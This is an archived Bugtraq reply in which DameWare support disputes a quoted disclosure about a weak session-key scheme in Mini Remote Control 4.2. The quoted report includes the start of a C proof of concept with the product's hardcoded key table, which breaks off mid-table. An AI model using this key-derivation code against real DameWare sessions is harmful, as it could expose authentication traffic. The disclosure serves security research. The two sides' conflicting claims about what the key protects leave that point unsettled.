In-Reply-To: <20040430182646.29912.qmail@www.securityfocus.com> This is definitely not an exploit, nor is it a vulnerability and therefore inaccurate & misleading. Furthermore, the information submitted by ax09001h@hotmail.com has nothing to do with obtaining the Session Encryption Key, nor does it reveal any confidential information. It is entirely "pre-authentication" information that has nothing to do with the Session Encryption Key, and it cannot be used to obtain the actual Session Encryption Key. The "Pre Authentication" data that is being encrypted/decrypted at this point in the remote control connection is not sensitive information and could just as well be sent in plain text. This so called "weak key" is not used for encrypting sensitive data and is only is used once for a single transmission of pre authentication data. ax09001h@hotmail.com made no attempts to contact DameWare Development directly to verify this claim before releasing the information. It is extremely irresponsible for anyone to release this kind of information without first contacting the vendor to verify its accuracy. Based on his or her actions it's fairly obvious that this anonymous person and or company are deliberately attempting to discredit DameWare Development & it's Mini Remote Control program. Support Staff DameWare Development, LLC. http://www.dameware.com >Received: (qmail 2813 invoked from network); 30 Apr 2004 19:34:03 -0000 >Received: from outgoing3.securityfocus.com (HELO outgoing.securityfocus.com) (205.206.231.27) > by mail.securityfocus.com with SMTP; 30 Apr 2004 19:34:03 -0000 >Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) > by outgoing.securityfocus.com (Postfix) with QMQP > id EE330236FDE; Fri, 30 Apr 2004 21:27:49 -0600 (MDT) >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@securityfocus.com> >List-Help: <mailto:bugtraq-help@securityfocus.com> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> >List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Received: (qmail 16648 invoked from network); 30 Apr 2004 12:57:51 -0000 >Date: 30 Apr 2004 18:26:46 -0000 >Message-ID: <20040430182646.29912.qmail@www.securityfocus.com> >Content-Type: text/plain >Content-Disposition: inline >Content-Transfer-Encoding: binary >MIME-Version: 1.0 >X-Mailer: MIME-tools 5.411 (Entity 5.404) >From: ax09001h <ax09001h@hotmail.com> >To: bugtraq@securityfocus.com >Subject: Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme > > > >Title: Dameware Mini Remote Control Version 4.2 ? Weak Key Agreement Scheme > >Versions: Dameware Mini Remote Control Version 4.2 > > >Vulnerability: The latest version of Dameware?s Mini Remote Control System uses a weak key agreement scheme. The scheme consists of the sharing of pointers into a fixed key lookup table. Both the client and the server have access to a key lookup table (KLT) consisting of 1000 32-bit values. Prior to encrypting traffic the server sends to the client a series of 32-bit integers, call it the key index table (KIT). For the sake of description lets call the indices klt_idx[4], an array of 4 32-bit integers. The klt_idx are set as follows: > >klt_idx[0] = KIT[100]; >klt_idx[1] = KIT[4]; >klt_idx[2] = 42; >klt_idx[3] = KIT[37]; > >The actual session key is then constructed as 4 32-bit integers, sk[4] as follows. > > sk[0] = KLT[klt_idx[0]]; > sk[1] = KLT[klt_idx[1]]; > sk[2] = KLT[klt_idx[2]]; > sk[3] = KLT[klt_idx[3]]; > >This of course produces 0-bits of security. > >They proceed to correct the Electronic Code Book mode of encrypting other authentication packets using the above constructed key using Blowfish in cipher block chaining mode with an IV = 0. > >Exploit: > >/* > > dwgenkey.c dameware generate key program. > > this function mimics the dameware > key generation algorithm used to > pass encrypted windows authentication > across between client and server > > > ax09001h@hotmail.com > > >*/ > > >#include <stdio.h> >#include <stdlib.h> > > >unsigned int KLT [1000] = >{ > 0x75A50CF3, 0x58509D61, 0x2352671F, 0x1C8694B4, 0x464A5B8D, 0x17F76F5D, > 0xF7CBFF22, 0xDEE4BBE7, 0x87C577D7, 0x7DE79418, 0x63099A11, 0x7FB4509, > 0xF8AE103C, 0xB8956F47, 0xA788EF1E, 0xBC1B225E, 0x1F6F1B29, 0x48A20FA2, > 0x73764E64, 0x9B1BAFE5, 0xC74859E3, 0xF34C3973, 0xD782E7EB, 0xBC2B83CD, > 0x333141DD, 0x78F91C49, 0x8C3C3C62, 0x430F1CA6, 0xF55CB058, 0x5474C05, > 0x2AD30B5F, 0x47B3AA97, 0xD1DE6ED1, 0x927DD4C0, 0x9043C47A, 0xCFA8D725, > 0x8F2A794B, 0x916758FC, 0x5C21B4C0, 0xAF5D6F28, 0x2E5B2EE9, 0xA4772762, > 0x5C35CBA8, 0x359EE4E1, 0xA778F423, 0xB4EB8D16, 0x846238D7, 0x9B9C7F88, > 0x708517E4, 0x8346D4FA, 0xE131395B, 0xB95282FD, 0x5434DB89, 0x2B00247B, > 0xAB5A14EC, 0x6A74879C, 0x1DF2EDE1, 0x9E9CBAD8, 0x6E4F97D5, 0x8910C7AE, > 0x6C76CD48, 0x4C5C0FDE, 0x1C408E04, 0xB1DC5C7B, 0xB226FFC5, 0x5C1D1096, > 0xA92D865A, 0x48D0FF4C, 0x87F9BF23, 0xF5E864C9, 0x80154A84, 0x38987089, > 0xA4F0EE08, 0x1630ADB9, 0x99F564BD, 0x69394C04, 0xC790C3E5, 0xF0E9E87E, > 0xB9F8AF1C, 0xF797E46C, 0x5F2F339D, 0xB792AB5F, 0x462050F7, 0xF922EDBD, > 0xD8EC238B, 0xDE30DFB6, 0xCAE883E7, 0x77748FED, 0x681AB4C8, 0x1610F821, > 0xAA69288, 0x88E41CCD, 0x81BEA8DB, 0x56236206, 0x3FF596A7, 0x7EB79B23, > 0x2939A1A1, 0x59F56A53, 0x175ACD1D, 0x9D442B3E, 0xCB0D47E3, 0x81BD054E, > 0xC5B5AED3, 0x420BFE41, 0xBA3446BE, 0x1F8AC66A, 0xB12D2A33, 0xD52EB9F3, > 0xFD572127, 0x1ED5C98C, 0x891E0430, 0x263E5AC2, 0xFCEBC8D7, 0x84ACE5F7, > 0x1093FA43, 0xFD07DD1D, 0xC4C91870, 0x1952527F, 0xF77D5A1B, 0xAA6E479B, > 0x26BBC409, 0x1B694B08, 0xAB1246FB, 0x413D0BB5, 0xAC6A46C9, 0x79217008, > 0x315A6C60, 0xA18609FB, 0x37C4221C, 0xD25D2622, 0x6CA0CC6F, 0x6E3A0EDC, > 0x9EA7C082, 0x8F22351D, 0xC58AEC76, 0x8A59BFEF, 0x98C5888F, 0x5EA76365, > 0x7E8B04D1, 0x44B5282D, 0x72547943, 0x6B49B88, 0xD8644EF3, 0x4DCA10BE, > 0x6666892F, 0xAC773084, 0x85A718BE, 0x9C648D4A, 0x3D6787F1, 0xED2DB263, > 0xCB0129DC, 0xAFB919E3, 0x2385872E, 0xE119C18F, 0x8F4ABB22, 0x7A153138, > 0xF4537078, 0x7B535CE4, 0x17E50602, 0x86AF582E, 0xA96A418E, 0x2E464810, > 0xEC0F2BF1, 0xD7500E84, 0xFB8248CB, 0xB6A0934D, 0x45A2F984, 0xDBB687C0, > 0x4FADD405, 0x19E5677B, 0x327DAB10, 0x6E82DD9C, 0x28B99205, 0x627FB642, > 0x13266166, 0xAC1D207E, 0x6757CB08, 0x75A551EE, 0xD8D440C7, 0xF9E198F7, > 0xDCD6C5DD, 0x9E91F814, 0xD411C844, 0x7CD5073B, 0x711214E6, 0x419766DA, > 0xE5209EFB, 0x1A4E0702, 0xD8B6C71, 0xDA3EAE89, 0xA1A00078, 0xB55B5C3E, > 0xE8EB204C, 0x9092BCB5, 0x753F8AA, 0x25DBC9DC, 0x75855E4, 0x5486F63D, > 0xE21C3971, 0x206B068A, 0xAEF41F63, 0xD6C45A84, 0x55CA81BF, 0x245EE02E, > 0x20A277EC, 0x2688325E, 0x5CC597BC, 0xC3C6D5, 0xE10FA336, 0x1E038ED1, > 0xD017BAA1, 0x60F3B322, 0x5C4B7883, 0x37C8827F, 0xA4401AB8, 0x3F0D1244, > 0x599287A9, 0x9FEBF317, 0x551B9574, 0x7B4490D6, 0x5167A51E, 0x75144C86, > 0xB58FA84E, 0xC2EFCD51, 0x62B1B44C, 0xF20CB94C, 0xFB1C3022, 0x5D9FA80E, > 0x9723B02E, 0x9BEB9BC0, 0x7D7D7D7C, 0xBBECAC8, 0xEE7C8FD6, 0x84E7032B, > 0x983051AE, 0x69E077E1, 0x4215FF00, 0x941F1398, 0x899CE29, 0x34FD70CC, > 0x151A4D02, 0x625EFD60, 0xCC9FC987, 0x5854F10C, 0xFDE6B36A, 0xE50E1F0, > 0x7D1AC470, 0x75CF6430, 0x691B188E, 0x861F8385, 0x899781B9, 0x453BBB9, > 0x33CCF322, 0x5BC03054, 0x1C8F4BCE, 0xB20EAD6C, 0x8FC48E15, 0xC650FD0C, > 0x5F9D8872, 0xD100E234, 0xCEBB178A, 0x20F2529F, 0x912889F8, 0x58EDD3F6, > 0x27F8EADA, 0xE501536D, 0xB8635884, 0x5525004, 0x9B6EBF24, 0x4E223C61, > 0x67C61B28, 0xBC8D0315, 0x186A6C99, 0xDAD6D525, 0x1C412AD1, 0x86B268E4, > 0x47B5AC03, 0x72506EEA, 0xCDF419F9, 0x9E062DB4, 0x236F81F7, 0xCF4BFFDF, > 0xF38B27B8, 0x17A2E942, 0xBDF70DFD, 0xB3ED596B, 0xD24583F5, 0x7D25304E, > 0x209350C6, 0xD171038E, 0xA7F746D2, 0x4DD38415, 0x7F7FB4D9, 0x60F193B5, > 0xAF480C11, 0x23E73939, 0x77853419, 0x835D55CE, 0xBCA629D0, 0xCDDA82C9, > 0xC6EC6933, 0xFD779112, 0x3477605F, 0xD56B9610, 0xAAB266A6, 0xF53E8558, > 0x61D7B1D6, 0x5C5ADCD4, 0x9C4C685B, 0x47D4C3FE, 0x956BB743, 0x7BEAB72C, > 0xEE0CADD4, 0x844F5B3D, 0xF6B76242, 0x7A48638E, 0x7A9FCA83, 0x8C5CFCB8, > 0xC5C0200F, 0x458E401B, 0xD0232077, 0x96EC41FB, 0x818E1178, 0xF039C809, > 0xD2CBF2F3, 0xD710BBDF, 0xAF373B6F, 0xECFF5238, 0xA7A90C76, 0xB291F856, > 0x76378535, 0x8AC59C93, 0xCC083868, 0x10B3DCBD, 0x726A72D1, 0xCAA8BABB, > 0x9C519F9B, 0xE57B91C2, 0x3938CA06, 0x8AB0A001, 0x81154FB1, 0xB8B999D9, > 0xB385C69F, 0xF62E1A24, 0xE352A419, 0x52719D67, 0x23D0D6E4, 0xD143E405, > 0x17D114A3, 0x7A590816, 0x4FB4C683, 0x96DE0346, 0x1C96B2B3, 0xE0FE73B, > 0x51FA1A82, 0xB5A325A9, 0x7244452E, 0x88411A62, 0x10F37E47, 0x80E9235D, > 0x8734E043, 0x7287A203, 0x7D322B79, 0x59F16B1A, 0xB715C112, 0x7F930942, > 0xE31AF1D4, 0xC8312072, 0xB949A15E, 0xE5A0942A, 0x21C62B9F, 0x3A8E4A04, > 0xA7B50B0A, 0xC7481BF1, 0xF1E2DB36, 0x8120EAAB, 0x9364D482, 0x481D5B4D, > 0x58460CE7, 0x6E1FE474, 0xCB180DE1, 0xF1FEA961, 0x6E663723, 0x7F713621, > 0xC421154, 0x14B18B19, 0xEB87F422, 0xE2100D60, 0x65ACBC65, 0xC1EA51EA, > 0x9DD0DF6A, 0x9AE68741, 0x1F5DEFA2, 0xA530969B, 0xB746D9D5, 0x1339A116, > 0x7C07054, 0xE118D5CE, 0xF13EE7DA, 0xA53EBE1E, 0x3864BC9, 0x27C3B146, > 0xF2057DFD, 0x5CDF8621, 0x24BBFA19, 0x9C207686, 0xFDA8C0B4, 0x7BC12DE, > 0x3B6E6ABD, 0xEE88CB8E, 0xF11F5F31, 0x17C36F90, 0x62545D14, 0x23BAA683, > 0xBCF05635, 0xEE710A20, 0x88D5C4C1, 0x45D242BC, 0x2618DAFA, 0x71C24008, > 0xEFF1F3E8, 0x90537430, 0xF941923C, 0xE806B643, 0x1E8F4C81, 0x98E93630, > 0x90ECFFE3, 0x422C75E1, 0xA19D77D3, 0x99D16114, 0xCA4380C8, 0xAF2A72E8, > 0x71114704, 0x97EBE3E0, 0x90D614F6, 0xF5408B6D, 0x841EE866, 0x35699601, > 0x9C004E8F, 0x5ACAC96F, 0xF1D181D3, 0xB1DB1F66, 0xAD36B6E6, 0xA3C182A3, > 0x6E159D3A, 0x4860F191, 0xA22499C0, 0xA8DD59AB, 0x5E729975, 0x5285CEC2, > 0xF0505102, 0x87294945, 0x17EE75CA, 0xD5E97597, 0xC36CD9A, 0xA45A497, > 0xA1215DDF, 0x41C84062, 0xC1C6536E, 0xE8AEF5BF, 0xBF109C2E, 0x402A1D1C, > 0x67DEDD8, 0x97061C4A, 0x936BACD0, 0xC34A5C19, 0xF40F90FE, 0xD7B03D1, > 0xD7C91313, 0xE03CF91D, 0x7176F3D4, 0x29440055, 0xBBB3A31C, 0x70F5A3C2, > 0x76E7D2A6, 0x536501F, 0xC77CA12B, 0x5E6E2842, 0x9896F26C, 0x2BC45D27, > 0xE2FF89C7, 0x11FBC8C, 0x252652BD, 0x61AA26A4, 0xF3DF28A, 0xAFB90C39, > 0x3C5BCF12, 0xE765B3A5, 0x6EBF07FE, 0x2630C3A2, 0xC0F995BC, 0x27677058, > 0x49E5FA9C, 0x3B66C518, 0x7654283D, 0xB8305341, 0x72E94CF, 0x3E181088, > 0x9F721122, 0xC536D545, 0x8BD48FE7, 0xA0899C0F, 0x950D4B9C, 0xCDFA8F86, > 0x9D1180B5, 0xB35F2925, 0x85CA36ED, 0x9FA58055, 0xEF0F31F9, 0xA5FADD9C, > 0x2ABB9F51, 0xC90E060A, 0xA0304ED8, 0xB6462678, 0x5ECAB5CB, 0x9BFA4C0C, > 0x1644830E, 0xC210F8D0, 0x3139A59B, 0xDE090D20, 0x89960C79, 0x489E6E7D, > 0xC3650D3F, 0x832E301C, 0x3EC2DEC2, 0x8C1BEFD2, 0x15374CE3, 0xA95682A4, > 0x694B8053, 0x8C003F9E, 0x3C792799, 0xC31B2A4B, 0xFD6F5781, 0x544F000B, > 0x151F60A6, 0x224E32E5, 0x9AD498E6, 0x8B74BFCC, 0x85C8C5DA, 0x221D7990, > 0x66C4A629, 0x1281D60A, 0xE0178028, 0x44E6DEBD, 0xBAAB265, 0x384C4B56, > 0xDC2F9A2C, 0x470211A4, 0xCBD167C3, 0xF5EED383, 0x1E1ED189, 0x29D803F9, > 0xC144F12E, 0x9AC2B5AB, 0xC3DB04A2, 0xC513EB91, 0x71DCF85C, 0x343B65E3, > 0x6B32E419, 0xAFFC770D, 0xBCE86B4D, 0x9AA723E4, 0x611A0E70, 0xFA441603, > 0x3171887D, 0x5AC8ABCD, 0x45A5A2E4, 0xA47AFB05, 0xF1FBA2F1, 0x1F7FA63
